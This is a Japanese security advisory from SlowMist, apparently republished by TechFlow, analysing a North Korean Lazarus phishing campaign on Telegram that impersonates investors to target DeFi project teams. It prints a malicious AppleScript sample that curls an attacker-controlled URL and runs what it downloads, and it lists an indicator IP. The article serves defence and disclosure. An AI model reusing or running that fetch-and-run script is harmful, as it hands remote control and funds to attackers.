
慢雾:北朝鮮ハッカーによるTelegramでの標的型詐欺攻撃の分析
TechFlow厳選深潮セレクト

慢雾:北朝鮮ハッカーによるTelegramでの標的型詐欺攻撃の分析
北朝鮮のハッカーが著名な投資機関を装い、プロジェクト側に対してフィッシング詐欺を行うようになり、影響範囲が広がっている。
執筆:23pds@SlowMistセキュリティチーム
背景
2022年、SlowMistセキュリティチームはSlowMist BTIインテリジェンスネットワークを通じて、北朝鮮ハッカー集団Lazarusが暗号資産業界を対象に大規模なTelegramフィッシング詐欺活動を開始していることを発見しました。最近では、このハッカー集団が著名な投資機関を装い、プロジェクト運営側に対してフィッシング詐欺を仕掛けています。影響範囲が広いため、ここに分析結果を提示します。

攻撃手法
1. 知名な投資機関を偽装対象として選び、偽のTelegramアカウントを作成する:

2. 有名なDeFiプロジェクト運営者を標的とし、「投資したい」という名目で偽アカウントを使って詐欺を実行する:

北朝鮮ハッカーはまずターゲットにチャットを送って接触します。プロジェクト側がメッセージを見逃さず、セキュリティ意識が低い場合、以下のような状況が生じます:


北朝鮮ハッカーはプロジェクト側の信頼を得た後、会議の設定を始めます。この段階には2つの攻撃手法があります:
1. プロジェクト側を***.group-meeting.teamなどの偽会議サイトに招待し、「面談や詳細な打ち合わせの時間調整」を装って、自ら悪意ある会議リンクを提供します。プロジェクト側がリンクをクリックすると地域制限があると表示され、その後ハッカーは「位置情報修正用」の悪意あるスクリプトのダウンロードと実行を促します。これを実行してしまうと、パソコンは北朝鮮ハッカーに制御され、資金が盗まれるリスクがあります。以下は悪意あるスクリプトIP_Request.scptの内容です:
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k""& fix_url &""\""
run script sc
コードの解説:

2. Calendly会議予約システムの「カスタムリンク追加」機能を利用して、イベントページに悪意あるリンクを挿入し、フィッシング攻撃を行います。Calendlyは多くのプロジェクト関係者の日常業務とよく統合されているため、こうした悪意あるリンクは疑われにくく、無意識にクリックされて悪意あるコードがダウンロード・実行される可能性があります。これにより、北朝鮮ハッカーは同様にシステム情報や権限を取得できます。

SlowMistセキュリティチームは2023年11月30日にも、関連する攻撃手法について警告を出しています:

基本的なIOC(攻撃指標):
IP:104.168.137.21
ドメイン:

悪意ある攻撃サンプル:


まとめ
このような詐欺行為が継続して発生していることから、Web3ユーザーは友達追加時に必ず二重の方法で相手の真偽を確認すること、またTelegramで二段階認証(2FA)を有効にすることを強く推奨します。常に取引の安全性に注意を払い、資金被害を防いでください。
万が一、誤ってマルウェアを実行してしまった場合は、直ちに関連する資金を移動し、インターネット接続を切断してウイルス対策を行い、対象のPC上で使用しているアカウントパスワード(ブラウザに保存されたものも含む)をすべて変更してください。
TechFlow公式コミュニティへようこそ
Telegram購読グループ:https://t.me/TechFlowDaily
Twitter公式アカウント:https://x.com/TechFlowPost
Twitter英語アカウント:https://x.com/BlockFlow_News














